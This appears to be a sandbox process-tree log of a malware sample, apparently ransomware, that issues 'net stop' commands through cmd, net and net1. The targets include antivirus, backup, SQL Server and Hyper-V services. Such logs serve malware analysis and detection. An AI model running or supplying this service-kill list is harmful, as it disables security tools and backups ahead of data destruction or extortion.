    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPS"
        5⤵
        
        PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
    3⤵
    PID:3880
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPSAMA"
      4⤵
      PID:1336
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
        5⤵
        
        PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "RESvc"
    3⤵
    PID:3452
  - - C:\Windows\system32\net.exe
      net stop "RESvc"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "RESvc"
        5⤵
        
        PID:300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sacsvr"
    3⤵
    PID:2604
  - - C:\Windows\system32\net.exe
      net stop "sacsvr"
      4⤵
      PID:3752
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sacsvr"
        5⤵
        
        PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SamSs"
    3⤵
    PID:3196
  - - C:\Windows\system32\net.exe
      net stop "SamSs"
      4⤵
      PID:1872
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SamSs"
        5⤵
        
        PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
    3⤵
    PID:2292
  - - C:\Windows\system32\net.exe
      net stop "SAVAdminService"
      4⤵
      PID:1824
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVAdminService"
        5⤵
        
        PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVService"
    3⤵
    PID:1424
  - - C:\Windows\system32\net.exe
      net stop "SAVService"
      4⤵
      PID:1792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVService"
        5⤵
        
        PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Smcinst"
    3⤵
    PID:3292
  - - C:\Windows\system32\net.exe
      net stop "Smcinst"
      4⤵
      PID:2816
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Smcinst"
        5⤵
        
        PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SmcService"
    3⤵
    PID:792
  - - C:\Windows\system32\net.exe
      net stop "SmcService"
      4⤵
      PID:2972
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SmcService"
        5⤵
        
        PID:2488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
    3⤵
    PID:3364
  - - C:\Windows\system32\net.exe
      net stop "SMTPSvc"
      4⤵
      PID:2324
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SMTPSvc"
        5⤵
        
        PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SNAC"
    3⤵
    PID:384
  - - C:\Windows\system32\net.exe
      net stop "SNAC"
      4⤵
      PID:3168
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SNAC"
        5⤵
        
        PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SntpService"
    3⤵
    PID:3004
  - - C:\Windows\system32\net.exe
      net stop "SntpService"
      4⤵
      PID:4008
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SntpService"
        5⤵
        
        PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sophossps"
    3⤵
    PID:3636
  - - C:\Windows\system32\net.exe
      net stop "sophossps"
      4⤵
      PID:60
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sophossps"
        5⤵
        
        PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:984
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:2132
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
        5⤵
        
        PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
    3⤵
    PID:3840
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$ECWDB2"
      4⤵
      PID:820
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
        5⤵
        
        PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:3972
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:2656
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
        5⤵
        
        PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:2392
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:1388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
        5⤵
        
        PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:3492
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:2176
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
        5⤵
        
        PID:540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:1856
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:2696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
        5⤵
        
        PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:3340
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:1224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
        5⤵
        
        PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
    3⤵
    PID:2612
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQL_2008"
      4⤵
      PID:3300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
        5⤵
        
        PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:1868
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:3024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
        5⤵
        
        PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
    3⤵
    PID:2992
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPS"
      4⤵
      PID:2940
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPS"
        5⤵
        
        PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
    3⤵
    PID:3460
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPSAMA"
      4⤵
      PID:516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
        5⤵
        
        PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1300
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:3488
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:2544
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:3764
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
    3⤵
    PID:1184
  - - C:\Windows\system32\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:3564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "SQLSafeOLRService"
      4⤵
      PID:3512
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSafeOLRService"
        5⤵
        
        PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
    3⤵
    PID:1336
  - - C:\Windows\system32\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:1924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
    3⤵
    PID:2872
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:2024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY"
        5⤵
        
        PID:1548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:3232
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:3840
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
        5⤵
        
        PID:3760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
    3⤵
    PID:2656
  - - C:\Windows\system32\net.exe
      net stop "SQLWriter"
      4⤵
      PID:3972
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWriter"
        5⤵
        
        PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
    3⤵
    PID:1388
  - - C:\Windows\system32\net.exe
      net stop "SstpSvc"
      4⤵
      PID:3668
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SstpSvc"
        5⤵
        
        PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
    3⤵
    PID:3020
  - - C:\Windows\system32\net.exe
      net stop "svcGenericHost"
      4⤵
      PID:1856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "svcGenericHost"
        5⤵
        
        PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "tmlisten"
    3⤵
    PID:1224
  - - C:\Windows\system32\net.exe
      net stop "tmlisten"
      4⤵
      PID:1436
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "tmlisten"
        5⤵
        
        PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "TrueKey"
    3⤵
    PID:2484
  - - C:\Windows\system32\net.exe
      net stop "TrueKey"
      4⤵
      PID:3644
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "TrueKey"
        5⤵
        
        PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
    3⤵
    PID:3424
  - - C:\Windows\system32\net.exe
      net stop "UI0Detect"
      4⤵
      PID:360
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "UI0Detect"
        5⤵
        
        PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
    3⤵
    PID:2168
  - - C:\Windows\system32\net.exe
      net stop "VeeamBackupSvc"
      4⤵
      PID:3716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBackupSvc"
        5⤵
        
        PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
    3⤵
    PID:3168
  - - C:\Windows\system32\net.exe
      net stop "VeeamBrokerSvc"
      4⤵
      PID:3476
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBrokerSvc"
        5⤵
        
        PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
    3⤵
    PID:2568
  - - C:\Windows\system32\net.exe
      net stop "VeeamCatalogSvc"
      4⤵
      PID:2544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCatalogSvc"
        5⤵
        
        PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
    3⤵
    PID:3564
  - - C:\Windows\system32\net.exe
      net stop "VeeamCloudSvc"
      4⤵
      PID:3636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCloudSvc"
        5⤵
        
        PID:296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
    3⤵
    PID:272
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploymentService"
      4⤵
      PID:1320
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploymentService"
        5⤵
        
        PID:420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
    3⤵
    PID:1188
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploySvc"
      4⤵
      PID:4004
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploySvc"
        5⤵
        
        PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:3452
  - - C:\Windows\system32\net.exe
      net stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:3520
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
        5⤵
        
        PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
    3⤵
    PID:3740
  - - C:\Windows\system32\net.exe
      net stop "VeeamMountSvc"
      4⤵
      PID:972
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamMountSvc"
        5⤵
        
        PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
    3⤵
    PID:2392
  - - C:\Windows\system32\net.exe
      net stop "VeeamNFSSvc"
      4⤵
      PID:540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamNFSSvc"
        5⤵
        
        PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
    3⤵
    PID:2176
  - - C:\Windows\system32\net.exe
      net stop "VeeamRESTSvc"
      4⤵
      PID:2788
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamRESTSvc"
        5⤵
        
        PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
    3⤵
    PID:1840
  - - C:\Windows\system32\net.exe
      net stop "VeeamTransportSvc"
      4⤵
      PID:3868
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamTransportSvc"
        5⤵
        
        PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "W3Svc"
    3⤵
    PID:2612
  - - C:\Windows\system32\net.exe
      net stop "W3Svc"
      4⤵
      PID:3300
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "W3Svc"
        5⤵
        
        PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:1868
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:3024
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:3812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WRSVC"
    3⤵
    PID:2992
  - - C:\Windows\system32\net.exe
      net stop "WRSVC"
      4⤵
      PID:2940
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WRSVC"
        5⤵
        
        PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:3460
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:516
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1300
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:3488
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:3944
  - - C:\Windows\system32\net.exe
      net stop "VeeamHvIntegrationSvc"
      4⤵
      PID:288
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
        5⤵
        
        PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "swi_update"
    3⤵
    PID:1280
  - - C:\Windows\system32\net.exe
      net stop "swi_update"
      4⤵
      PID:1184
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "swi_update"
        5⤵
        
        PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CXDB"
      4⤵
      PID:1316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CXDB"
        5⤵
        
        PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:984
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:428
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
        5⤵
        
        PID:268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
    3⤵
    PID:3000
  - - C:\Windows\system32\net.exe
      net stop "SQL Backups"
      4⤵
      PID:1564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQL Backups"
        5⤵
        
        PID:908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
    3⤵
    PID:2140
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROD"
      4⤵
      PID:448
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROD"
        5⤵
        
        PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
    3⤵
    PID:300
  - - C:\Windows\system32\net.exe
      net stop "Zoolz 2 Service"
      4⤵
      PID:2580
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Zoolz 2 Service"
        5⤵
        
        PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
    3⤵
    PID:3032
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper"
      4⤵
      PID:3464
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper"
        5⤵
        
        PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
    3⤵
    PID:636
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROD"
      4⤵
      PID:2292
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROD"
        5⤵
        
        PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
    3⤵
    PID:3292
  - - C:\Windows\system32\net.exe
      net stop "msftesql$PROD"
      4⤵
      PID:3020
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$PROD"
        5⤵
        
        PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
    3⤵
    PID:1440
  - - C:\Windows\system32\net.exe
      net stop "NetMsmqActivator"
      4⤵
      PID:1436
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetMsmqActivator"
        5⤵
        
        PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
    3⤵
    PID:2612
  - - C:\Windows\system32\net.exe
      net stop "EhttpSrv"
      4⤵
      PID:2896
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EhttpSrv"
        5⤵
        
        PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ekrn"
    3⤵
    PID:2488
  - - C:\Windows\system32\net.exe
      net stop "ekrn"
      4⤵
      PID:3012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ekrn"
        5⤵
        
        PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
    3⤵
    PID:3456
  - - C:\Windows\system32\net.exe
      net stop "ESHASRV"
      4⤵
      PID:2588
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ESHASRV"
        5⤵
        
        PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
    3⤵
    PID:3364
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SOPHOS"
      4⤵
      PID:3780
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
        5⤵
        
        PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
    3⤵
    PID:1376
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SOPHOS"
      4⤵
      PID:4080
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
        5⤵
        
        PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AVP"
    3⤵
    PID:3764
  - - C:\Windows\system32\net.exe
      net stop "AVP"
      4⤵
      PID:1496
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AVP"
        5⤵
        
        PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "klnagent"
    3⤵
    PID:3880
  - - C:\Windows\system32\net.exe
      net stop "klnagent"
      4⤵
      PID:3592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "klnagent"
        5⤵
        
        PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:3564
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:204
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
        5⤵
        
        PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:3540
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:268
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
        5⤵
        
        PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:984
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:820
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "HvHost"
    3⤵
    PID:3520
  - - C:\Windows\system32\net.exe
      net stop "HvHost"
      4⤵
      PID:3792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "HvHost"
        5⤵
        
        PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
    3⤵
    PID:2196
  - - C:\Windows\system32\net.exe
      net stop "vmickvpexchange"
      4⤵
      PID:3840
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmickvpexchange"
        5⤵
        
        PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
    3⤵
    PID:3232
  - - C:\Windows\system32\net.exe
      net stop "vmicguestinterface"
      4⤵
      PID:1500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicguestinterface"
        5⤵
        
        PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
    3⤵
    PID:3724
  - - C:\Windows\system32\net.exe
      net stop "vmicshutdown"
      4⤵
      PID:3280
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicshutdown"
        5⤵
        
        PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
    3⤵
    PID:3396
  - - C:\Windows\system32\net.exe
      net stop "vmicheartbeat"
      4⤵
      PID:740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicheartbeat"
        5⤵
        
        PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmcompute"
    3⤵
    PID:1448
  - - C:\Windows\system32\net.exe
      net stop "vmcompute"
      4⤵
      PID:2500
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmcompute"
        5⤵
        
        PID:3644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
    3⤵
    PID:1932
  - - C:\Windows\system32\net.exe
      net stop "vmicvmsession"
      4⤵
      PID:1060
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvmsession"
        5⤵
        
        PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
    3⤵
    PID:3424
  - - C:\Windows\system32\net.exe
      net stop "vmicrdv"
      4⤵
      PID:3012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicrdv"
        5⤵
        
        PID:3548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
    3⤵
    PID:516
  - - C:\Windows\system32\net.exe
      net stop "vmictimesync"
      4⤵
      PID:3252
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmictimesync"
        5⤵
        
        PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "vmicvss"
    3⤵
    PID:2268
  - - C:\Windows\system32\net.exe
      net stop "vmicvss"
      4⤵
      PID:1540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicvss"
        5⤵
        
        PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
    3⤵
    PID:1376
  - - C:\Windows\system32\net.exe
      net stop "VMAuthdService"
      4⤵
      PID:1852
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VMAuthdService"
        5⤵
        
        PID:1496
